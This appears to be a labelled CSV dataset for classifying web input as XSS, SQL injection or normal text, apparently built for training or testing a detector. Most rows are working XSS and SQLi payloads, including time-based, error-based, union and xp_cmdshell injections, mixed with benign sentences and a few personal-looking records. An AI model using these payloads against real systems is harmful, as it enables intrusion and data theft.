Where's the podiatrist?,3,normal,23634
"<var draggable=""true"" ondragend=""alert(1)"">test</var>",1,XSS,5051
"1' and make_set ( 2942 = 8200,8200 ) and 'jnhv' like 'jnhv",2,SQLi,17360
Retrieve rows where applicable.,3,normal,23300
"<canvas onbeforecut=""alert(1)"" contenteditable>test</canvas>",1,XSS,3460
"-5972"" or 8509 = 3448#",2,SQLi,21459
1' in boolean mode ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,16186
"select * from users where id = 1 or "" ) ."" = 1 or 1 = 1 -- 1",2,SQLi,17126
"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( 'xzlx' like 'xzlx",2,SQLi,10687
-3105' or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and 'srep' = 'srep,2,SQLi,10603
"1"" ) as hsws where 6656 = 6656",2,SQLi,20579
<mark id=x tabindex=1 onactivate=alert(1)></mark>,1,XSS,5786
"<nav onpaste=""alert(1)"" contenteditable>test</nav>",1,XSS,5552
"1 ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13387
"-3461"" ) ) union all select 6342,6342,6342,6342,6342,6342#",2,SQLi,17370
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>,1,XSS,43
"<div draggable=""true"" contenteditable>drag me</div><ruby ondrop=alert(1) contenteditable>drop here</ruby>",1,XSS,1235
"From there, select Language and Input and then On-screen Keyboard.",3,normal,26157
1' in boolean mode ),2,SQLi,21847
"<script> setTimeout(\\""writetitle()\\"",$\_GET\[\]) </script>",1,XSS,3499
"<b oncontextmenu=""alert(1)"">test</b>",1,XSS,8843
RLIKE SLEEP(5) OR '1337'='1337,2,SQLi,20518
1' and 7533 = 7533,2,SQLi,22066
<cite id=x tabindex=1 onfocusin=alert(1)></cite>,1,XSS,5973
<div onpointerleave=alert(1)>XSS</div>,1,XSS,8320
<q id=x tabindex=1 onfocusin=alert(1)></q>,1,XSS,7400
><img src=x onerror=javascript:alert(A)>,1,XSS,7828
"1' where 8451 = 8451 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,15054
"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 7 ) ) AND 'i' = 'i",2,SQLi,11462
"<shadow draggable=""true"" ondragend=""alert(1)"">test</shadow>",1,XSS,3695
1 waitfor delay '0:0:5'-- nnnp,2,SQLi,20549
"Home Depot: Save up to 40% off select bath & kitchen essentials, up to 753% off select bedding, up to 30% off select storage solutions.",3,normal,26092
"-8060"" ) where 5290 = 5290 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --",2,SQLi,12735
<SCRIPT SRC=%(jscript)s?<B>,1,XSS,9647
<data id=x tabindex=1 ondeactivate=alert(1)></data><input id=y autofocus>,1,XSS,2310
"1%"" or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19469
"1"" ) where 9855 = 9855",2,SQLi,21493
group by userid having 1=1--,2,SQLi,20783
"<style>:target {transform: rotate(180deg);}</style><cite id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></cite>",1,XSS,653
1' ) ) as uizu where 1774 = 1774,2,SQLi,20339
"1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( 'gwew' like 'gwew",2,SQLi,12092
<aside onpointerup=alert(1)>XSS</aside>,1,XSS,8140
"<style>@keyframes slidein {}</style><area style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></area>",1,XSS,401
<button id=x tabindex=1 ondeactivate=alert(1)></button><input id=y autofocus>,1,XSS,2144
"<a href=""\xE2\x80\x88javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2014
1' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( 'cbnc' like 'cbnc,2,SQLi,10323
<output id=x tabindex=1 onfocusin=alert(1)></output>,1,XSS,5132
"-1684"" ) ) ) union all select 7473,7473#",2,SQLi,19467
"<object onbeforecut=""alert(1)"" contenteditable>test</object>",1,XSS,3495
"1"" ) ) as ufba where 4049 = 4049",2,SQLi,20256
"<p onkeyup=""alert(1)"" contenteditable>test</p>",1,XSS,6425
"1"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ""mynm"" like ""mynm",2,SQLi,15551
"1' ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( 'tpcm' like 'tpcm",2,SQLi,11402
"-1339 ) ) ) union all select 2938,2938,2938,2938,2938,2938#",2,SQLi,17239
Where's the perfect spot to unwind?,3,normal,23940
"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'kyos' like 'kyos",2,SQLi,14353
1'|| ( select 'irfn' where 8360 = 8360,2,SQLi,19779
"1"" ) as pobe where 1704 = 1704",2,SQLi,20558
"<style>@keyframes slidein {}</style><legend style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></legend>",1,XSS,368
"<link onkeyup=""alert(1)"" contenteditable>test</link>",1,XSS,5131
Select your check.,3,normal,25000
"-5857%"" ) ) or 5023 = ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""%"" = """,2,SQLi,10411
"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""qwdi"" = ""qwdi",2,SQLi,12088
"<button onbeforepaste=""alert(1)"" contenteditable>test</button>",1,XSS,3211
or SELECT SLEEP(5); #,2,SQLi,21572
-2960' or 2163 = 3143--,2,SQLi,21304
<BODY ONLOAD=alert('XSS')>,1,XSS,7333
<video id=x tabindex=1 onbeforedeactivate=alert(1)></video><input autofocus>,1,XSS,2187
-1940 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ),2,SQLi,10864
Join us for lunch.,3,normal,22768
"To change the format, go to your Memories, select the story you want to share, tap ""Export Story"" and select the style you prefer.",3,normal,25284
"<style>@keyframes slidein {}</style><base style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></base>",1,XSS,403
1%' ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ( '%' = ',2,SQLi,15158
select ( case when ( 7169 = 7785 ) then 1 else 7169* ( select 7169 from master..sysdatabases ) end ) --,2,SQLi,13979
"-3828%"" ) ) ) or make_set ( 1765 = 8657,8657 ) and ( ( ( ""%"" = """,2,SQLi,16754
"1'|| ( select 'skds' from dual where 8594 = 8594 and make_set ( 6779 = 2027,2027 ) ) ||'",2,SQLi,14783
"1"" ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ""ureu"" like ""ureu",2,SQLi,11945
1 ) ) as zoso where 3633 = 3633,2,SQLi,20431
"1 ) ) ) and make_set ( 8882 = 1593,1593 ) and ( ( ( 7989 = 7989",2,SQLi,16881
1 ) ) ) and 7533 = 7533 and ( ( ( 7740 = 7740,2,SQLi,19037
1'|| ( select 'iuud' where 3687 = 3687,2,SQLi,19774
<strike id=x tabindex=1 ondeactivate=alert(1)></strike><input id=y autofocus>,1,XSS,2136
I'll order a tasty dessert.,3,normal,22999
<address id=x tabindex=1 onfocusin=alert(1)></address>,1,XSS,4769
"<table background=""javascript:javascript:alert(1)"">",1,XSS,5335
1' ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 'njge' like 'njge,2,SQLi,10478
"1' ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( 'aduc' = 'aduc",2,SQLi,10605
Where can I select a course for personal growth?,3,normal,23838
"<div draggable=""true"" contenteditable>drag me</div><datalist ondrop=alert(1) contenteditable>drop here</datalist>",1,XSS,875
select sleep ( 5 ) and ( 'dcys' like 'dcys,2,SQLi,19265
1' ) where 6092 = 6092,2,SQLi,21509
"1'|| ( select 'dujx' where 6896 = 6896 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11290
Filter out irrelevant comments from the post.,3,normal,22898
Select map.,3,normal,24660
"-3581'|| ( select 'uxmh' from dual where 8954 = 8954 union all select 8954,8954,8954,8954,8954,8954#",2,SQLi,14131
We'll select a leader.,3,normal,24475
"1"" ) ) as ihfw where 3949 = 3949 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,12733
"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#",2,SQLi,15685
"1' ) ) ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11685
"1"" ) ) as irrz where 8730 = 8730 order by 1#",2,SQLi,19124
"-5779 ) union all select 6089,6089--",2,SQLi,19991
Select courier.,3,normal,24707
"1 where 3410 = 3410 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12527
"<img src=""javascript:alert(2)"">",1,XSS,9511
"var contentType = <%=Request.getParameter(""content_type"")%>;",1,XSS,3428
"1 and elt ( 3172 = 7243,7243 )",2,SQLi,20651
"select * from users where id = 1 or "";,"" = 1 or 1 = 1 -- 1",2,SQLi,17338
"In making such comparisons, it is always desirable, if possible, to select as standards longperiod gauges which are so situated that the short-period district lies.",3,normal,26011
-1021 ) as erjh where 7845 = 7845 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,10100
"-9774' ) ) ) union all select 6954,6954,6954#",2,SQLi,19024
select current_setting('log_connections');,2,SQLi,19321
TechCrunch and Facebook will select four judges for each theme.,3,normal,25502
"-8940"" ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ""vnuo"" like ""vnuo",2,SQLi,9985
"1"" and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ""svse"" = ""svse",2,SQLi,11251
"<source draggable=""true"" ondragleave=""alert(1)"">test</source>",1,XSS,3331
<svg><rtc onload=alert(1)></rtc>,1,XSS,9422
1' ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( 'ohqs' like 'ohqs,2,SQLi,12723
They select the best candidates.,3,normal,24465
"and (select substring(@@version,3,1))='c'",2,SQLi,19327
1 rlike sleep ( 5 ) -- muhp,2,SQLi,20890
<img id=x tabindex=1 onfocus=alert(1)></img>,1,XSS,6961
<base onpointerleave=alert(1)>XSS</base>,1,XSS,7919
"select * from users where id = 1 or 1#"" ( union select 'a',version ( ) -- 1",2,SQLi,15588
"<svg onkeyup=""alert(1)"" contenteditable>test</svg>",1,XSS,5535
"1'|| ( select 'baur' from dual where 9384 = 9384 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11385
"<style>:target {color:red;}</style><noembed id=x style=""transition:color 1s"" ontransitionend=alert(1)></noembed>",1,XSS,936
Please unban pubg and ignore the lame excuses of PTA who most important reason is youth has selected you as PM.,3,normal,26488
"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and 'lckw' = 'lckw",2,SQLi,13175
<plaintext onfocusout=alert(1) tabindex=1 id=x></plaintext><input autofocus>,1,XSS,2180
<script src=javascript:alert(1)>,1,XSS,9480
"-4028 ) where 3244 = 3244 union all select 3244,3244,3244,3244,3244,3244,3244,3244--",2,SQLi,14967
Select a gift for your loved one.,3,normal,24004
<abbr id=x tabindex=1 onbeforeactivate=alert(1)></abbr>,1,XSS,4473
-9327' ) or 3038 = 3038,2,SQLi,21332
1%' ) ) and 1651 = 9324 and ( ( '%' = ',2,SQLi,19629
<dir onpointermove=alert(1)>XSS</dir>,1,XSS,8577
"<datalist onmousemove=""alert(1)"">test</datalist>",1,XSS,6001
"<noembed ondblclick=""alert(1)"">test</noembed>",1,XSS,6665
"1' and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,12864
1 ) and 3861 = 5813--,2,SQLi,21672
<;SCRIPT SRC=//>;,1,XSS,9415
"<body onkeyup=""alert(1)"" contenteditable>test</body>",1,XSS,5154
"1"" ) where 6065 = 6065 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11486
"<div draggable=""true"" ondragend=""alert(1)"">test</div>",1,XSS,4979
"<style>@keyframes x{}</style><textarea style=""animation-name:x"" onanimationstart=""alert(1)""></textarea>",1,XSS,1341
-2174' ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'dyyg' = 'dyyg,2,SQLi,12544
<BODY ONLOAD=alert(�XSS�)>,1,XSS,9675
"-4692%"" ) ) union all select 1781,1781#",2,SQLi,19641
"{""id"":null,""firstName"":""Jack"",""lastName"":""Tan"",""address"":""2276 WILTON DR, WILTON MANORS FL 33305"",""city"":""912"",""telephone"":""3524612823""}",3,normal,27185
"-7531' ) union all select 3072,3072,3072,3072,3072,3072,3072--",2,SQLi,16913
"-4745"" or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ""nifq"" like ""nifq",2,SQLi,12805
"-8080"" ) as nlos where 8917 = 8917 union all select 8917,8917,8917,8917--",2,SQLi,15851
Let's decide where to go for our family vacation.,3,normal,23920
"<style>@keyframes x{}</style><html style=""animation-name:x"" onanimationstart=""alert(1)""></html>",1,XSS,1605
"{""id"":null,""firstName"":""Lee"",""lastName"":""Shaun"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26876
Merge the colorful threads.,3,normal,22585
"1%' ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14983
declare @q nvarchar (4000) select @q =,2,SQLi,19660
"<multicol onclick=""alert(1)"">test</multicol>",1,XSS,6815
"1' ) ) as anaq where 9605 = 9605 and elt ( 4249 = 4249,7259 ) --",2,SQLi,16802
1 ) where 5944 = 5944 and ( 4446 = 8843 ) *8843--,2,SQLi,18595
Select a scent for your sanctuary.,3,normal,24037
"1 ) ) as acni where 6355 = 6355 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12356
"-3872%"" ) ) ) union all select 1637,1637,1637,1637,1637#",2,SQLi,17693
Select vodka.,3,normal,24518
<marquee onpointerover=alert(1)>XSS</marquee>,1,XSS,6729
Select a coffee roast for your morning cup.,3,normal,24165
"<ul draggable=""true"" ondragend=""alert(1)"">test</ul>",1,XSS,5367
"select * from users where id = '1' or ( \ ) = 1 union select 1,@@VERSION -- 1'",2,SQLi,15313
"-6363"" ) where 4043 = 4043 union all select 4043,4043,4043,4043,4043,4043,4043,4043,4043--",2,SQLi,14709
1' ) and ( 3020 = 3020 ) *6703 and ( 'rskq' = 'rskq,2,SQLi,18318
<blink id=x tabindex=1 onbeforedeactivate=alert(1)></blink><input autofocus>,1,XSS,2185
"<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>",1,XSS,1500
1'+ ( select smze where 5616 = 5616,2,SQLi,20101
Dan Nathan is a seller the Financial Select SPDR ETF.,3,normal,26253
And so how do you select who purchases your home?,3,normal,26369
"<footer ondblclick=""alert(1)"">test</footer>",1,XSS,7105
<keygen onfocusout=alert(1) tabindex=1 id=x></keygen><input autofocus>,1,XSS,2536
"-4397' ) ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ( 'omqt' = 'omqt",2,SQLi,16190
1' ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( 'hqcz' = 'hqcz,2,SQLi,14929
or WAITFOR DELAY '0:0:5'--,2,SQLi,20951
"<bdi onmouseout=""alert(1)"">test</bdi>",1,XSS,8646
-4901 ) or 3407 = 6442#,2,SQLi,21337
"select * from users where id = 1 +1 union select null,banner from v$version where rownum = 1 -- 1",2,SQLi,14247
"1' where 4701 = 4701 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,10759
Select create.,3,normal,24605
select ( case when ( 4719 = 8852 ) then 1 else 4719* ( select 4719 from master..sysdatabases ) end ) --,2,SQLi,13976
1 ) as mtnw where 7293 = 7293 and 2603 = 5764--,2,SQLi,18888
<button onBeforeCut=javascript:alert(1)>,1,XSS,8072
"1'+ ( select bldn where 8321 = 8321 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13759
Where's the beach?,3,normal,23519
1 ) ) as ojjk where 3687 = 3687 and ( 4833 = 9218 ) *9218--,2,SQLi,17305
Select a language to learn.,3,normal,24020
"<sub onclick=""alert(1)"">test</sub>",1,XSS,9292
"<center ondblclick=""alert(1)"">test</center>",1,XSS,7177
"<img ondblclick=""alert(1)"">test</img>",1,XSS,8678
"<th onbeforecopy=""alert(1)"" contenteditable>test</th>",1,XSS,4959
"{""id"":null,""name"":""shells positive""}",3,normal,27491
"1%' and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and '%' = '",2,SQLi,10845
1 ) ) as efjb where 4642 = 4642 order by 1#,2,SQLi,19233
"1'|| ( select 'jpow' from dual where 4381 = 4381 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) ||'",2,SQLi,10806
"-9896"" ) ) ) union all select 4073,4073,4073,4073,4073#",2,SQLi,17835
"<var onmouseover=""alert(1)"">test</var>",1,XSS,8333
Check conditions where possible.,3,normal,23274
"iif ( 1157 = 4542,1,1/0 )",2,SQLi,21055
"1"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""nevr"" like ""nevr",2,SQLi,13594
"When you select it, it removes every apostrophe in the story.",3,normal,25149
"ABC<div style=""x:\xE2\x80\x8Aexpression(javascript:alert(1)"">DEF",1,XSS,2857
"1' and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and 'zetf' = 'zetf",2,SQLi,14679
"<spacer oncut=""alert(1)"" contenteditable>test</spacer>",1,XSS,4823
"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><command id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></command>",1,XSS,169
1' ) as dqgr where 2427 = 2427 and ( 3020 = 3020 ) *6703--,2,SQLi,17427
"<bdi draggable=""true"" ondragenter=""alert(1)"">test</bdi>",1,XSS,4574
"<picture onmousedown=""alert(1)"">test</picture>",1,XSS,6435
"Abstraction differs from Analysis, inasmuch as its object is to select a particular quality for consideration in itself as it is found in all the objects to which it belongs, whereas analysis considers all the qualities which belong to a single object.",3,normal,26418
<dl id=x tabindex=1 onactivate=alert(1)></dl>,1,XSS,6663
"{""id"":null,""firstName"":""Rita"",""lastName"":""Ong"",""address"":""4 B Blue Ridge Blvd"",""city"":""931"",""telephone"":""986131662""}",3,normal,27431
<animatetransform onpointerenter=alert(1)>XSS</animatetransform>,1,XSS,2925
Delete items.,3,normal,23021
"1"" ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ""kpwc"" like ""kpwc",2,SQLi,12458
1' ) as ghvi where 3880 = 3880 and 4595 = 4595#,2,SQLi,18886
Join us for dinner.,3,normal,22552
"{""id"":null,""firstName"":""Goh"",""lastName"":""Lai Chee"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27037
<legend id=x tabindex=1 onbeforeactivate=alert(1)></legend>,1,XSS,3744
"<h1 onpaste=""alert(1)"" contenteditable>test</h1>",1,XSS,5873
Draper James: 50 percent off select styles; through May 30,3,normal,26233
=+ SLEEP(5) + ',2,SQLi,9922
Select your conversation.,3,normal,24908
1 ) ) as svhd where 9761 = 9761,2,SQLi,20433
"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><video id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></video>",1,XSS,207
select ( case when ( 1275 = 7674 ) then 1275 else 1275* ( select 1275 from information_schema.character_sets ) end ) #,2,SQLi,13212
1 ) as fhvr where 5544 = 5544,2,SQLi,20735
1' and 7528 = 2894 and 'qoyw' = 'qoyw,2,SQLi,19820
<bdi onpointerleave=alert(1)>XSS</bdi>,1,XSS,8365
"1"" where 4652 = 4652 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14224
Select the most comfortable chair in the room.,3,normal,24042
"select * from users where id = 1 %$ 1 union select null,@@VERSION -- 1",2,SQLi,16135
"{""id"":null,""firstName"":""Rohaida"",""lastName"":""Ibrahim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27032
"<shadow onpaste=""alert(1)"" contenteditable>test</shadow>",1,XSS,4345
"1' where 2774 = 2774 union all select null,null,null,null,null#",2,SQLi,16871
-1765' ) order by 1--,2,SQLi,21592
Select a cozy nook to relax in.,3,normal,22945
"1"" ) as bllz where 6975 = 6975 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13737
"<dt onmouseenter=""alert(1)"">test</dt>",1,XSS,8695
"<samp onmouseover=""alert(1)"">test</samp>",1,XSS,7873
"select * from users where id = 1<@.. union select 1,version ( ) -- 1",2,SQLi,16362
Select the perfect accessory for the outfit.,3,normal,24033
or 0 = 0 #,2,SQLi,22435
"1 ) as clye where 7842 = 7842 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11651
"1%' ) ) union all select null,null,null,null,null,null,null--",2,SQLi,17092
"1"" where 4597 = 4597 rlike sleep ( 5 ) --",2,SQLi,19375
<script src=//>,1,XSS,8742
<listing onpointerleave=alert(1)>XSS</listing>,1,XSS,6356
"1 ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 5349 = 5349",2,SQLi,10983
"<slot onmouseup=""alert(1)"">test</slot>",1,XSS,8407
"end and ( ( ""kvts"" like ""kvts",2,SQLi,20756
"-7036%' or 5023 = ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and '%' = '",2,SQLi,10587
"1"" ) ) as gbxx where 2459 = 2459 waitfor delay '0:0:5'--",2,SQLi,17726
"<rt onbeforecopy=""alert(1)"" contenteditable>test</rt>",1,XSS,4896
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->,1,XSS,2880
"<progress onkeyup=""alert(1)"" contenteditable>test</progress>",1,XSS,3528
"or ""a""=""a",2,SQLi,22451
"<div draggable=""true"" contenteditable>drag me</div><basefont ondrop=alert(1) contenteditable>drop here</basefont>",1,XSS,898
"select * from users where id = 1 or "" ( @"" or 1 = 1 -- 1",2,SQLi,17577
<blink id=x tabindex=1 ondeactivate=alert(1)></blink><input id=y autofocus>,1,XSS,2228
Update the app.,3,normal,22882
"end and ( ( ""rqay"" like ""rqay",2,SQLi,20686
"<style>@keyframes x{}</style><samp style=""animation-name:x"" onanimationstart=""alert(1)""></samp>",1,XSS,1597
"-5391 or make_set ( 9354 = 9354,7185 ) # ptyy",2,SQLi,19039
Filter the spam messages.,3,normal,22613
Where's my missing sock?,3,normal,22560
"<ul draggable=""true"" ondragenter=""alert(1)"">test</ul>",1,XSS,4956
Select save.,3,normal,24595
"{""id"":null,""firstName"":""Kuroko"",""lastName"":""Shinzuki"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27489
"<listing onkeydown=""alert(1)"" contenteditable>test</listing>",1,XSS,3463
"<title draggable=""true"" ondragenter=""alert(1)"">test</title>",1,XSS,3691
-1603' ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'abmo' = 'abmo,2,SQLi,12523
exec master..xp_cmdshell 'net+view',2,SQLi,20008
"<! foo=""><script>alert(1)</script>"">",1,XSS,8769
Select the perfect piece of artwork.,3,normal,24073
"1"" ) ) union all select null,null,null,null,null--",2,SQLi,18519
"<style>@keyframes slidein {}</style><summary style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></summary>",1,XSS,336
"<tbody onmouseleave=""alert(1)"">test</tbody>",1,XSS,7166
"<b draggable=""true"" ondragend=""alert(1)"">test</b>",1,XSS,5813
select case when 7951 = 1147 then 1 else null end--,2,SQLi,18299
"1"" ) as awdg where 9512 = 9512",2,SQLi,20572
"<option oncontextmenu=""alert(1)"">test</option>",1,XSS,6487
"<rp onmouseover=""alert(1)"">test</rp>",1,XSS,8881
select ( case when ( 3076 = 3596 ) then 3076 else 3076* ( select 3076 from mysql.db ) end ) #,2,SQLi,14483
"<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>",1,XSS,1809
